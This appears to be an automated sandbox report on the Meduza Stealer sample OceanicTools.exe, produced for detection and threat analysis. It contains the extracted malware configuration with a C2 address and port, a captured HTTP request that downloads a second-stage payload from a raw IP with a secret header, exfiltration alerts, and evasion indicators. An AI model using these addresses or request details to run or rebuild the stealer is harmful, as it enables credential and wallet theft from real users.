Windows Analysis Report
OceanicTools.exe

Overview

General Information

Sample name: OceanicTools.exe
Analysis ID: 1532355
MD5: f975ef6b34160bff3ba3c8c815f9e77c
SHA1: 4b818a41b68f8ed6f6719db14e19f955a60aebe8
SHA256: ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af
Tags: exeuser-aachum
Infos:

Detection

CredGrabber, Meduza Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Creates files in alternative data streams (ADS)
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Ping/Del Command Combination
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Avira: detection malicious, Label: HEUR/AGEN.1354117
Found malware configuration
Source: 14.2.qflwedtkihuzyxlg.exe.140000000.0.raw.unpack Malware Configuration Extractor: Meduza Stealer {"C2 url": "79.137.202.152", "anti_vm": true, "anti_dbg": true, "port": 15666, "build_name": "Legenda", "self_destruct": true, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "links": "", "grabber_max_size": 1048576}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006FB80 CryptUnprotectData,LocalFree, 14_2_000000014006FB80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140035E00 CryptUnprotectData,LocalFree, 14_2_0000000140035E00
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006FEA0 CryptProtectData,LocalFree, 14_2_000000014006FEA0
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: OceanicTools.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B6740 FindClose,FindFirstFileExW,GetLastError, 14_2_00000001400B6740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D00F8 FindFirstFileW, 14_2_00000001400D00F8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007EF60 GetLogicalDriveStringsW, 14_2_000000014007EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\wtr\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\ Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\hwvid-migration-2\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then push rdi 11_2_00007FF6351DC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then sub rsp, 28h 11_2_00007FF6351DC460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then sub rsp, 28h 14_2_00007FF6351DC460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then push rdi 14_2_00007FF6351DC950

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.5:49962 -> 79.137.202.152:15666
Source: Network traffic Suricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.5:49962 -> 79.137.202.152:15666
Source: Network traffic Suricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.5:49962 -> 79.137.202.152:15666
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49962 -> 79.137.202.152:15666
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phantomtoolsv2.exe HTTP/1.1Host: 185.208.158.47Accept-Encoding: gzipX-Secret-Phrase: AnalNosorog256
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.137.202.152 79.137.202.152
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PSKSET-ASRU PSKSET-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007C5E0 recv,recv,closesocket,WSACleanup, 14_2_000000014007C5E0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phantomtoolsv2.exe HTTP/1.1Host: 185.208.158.47Accept-Encoding: gzipX-Secret-Phrase: AnalNosorog256
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: OceanicTools.exe String found in binary or memory: http://185.208.158.47/phantomtoolsv2.exe
Source: OceanicTools.exe String found in binary or memory: http://185.208.158.47/phantomtoolsv2.exeAnalNosorog256X-Secret-Phrase
Source: powershell.exe, 00000009.00000002.2430659101.00000220FAA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.2430659101.00000220FAA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: OceanicTools.exe String found in binary or memory: http://https:///&?=-_.~:
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.a.0/sTy
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.a.0/sTyi
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c.0/ti
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c.0/tif
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.hotosh
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.hotoshi
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adoraw-se
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adoraw-sei
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.photo/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.photo/i
Source: powershell.exe, 00000005.00000002.2221407009.000001AA5B74D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
Source: powershell.exe, 00000009.00000002.2428854382.00000220FA8F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/8v
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qflwedtkihuzyxlg.exe.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000005.00000002.2221407009.000001AA5B74D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E3F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673411537.000001FB139F3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FEE000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A92000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A45000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A9A000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C88000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E47000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C80000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC8000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A3D000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OceanicTools.exe String found in binary or memory: https://www.haskell.org/ghc/reportabug
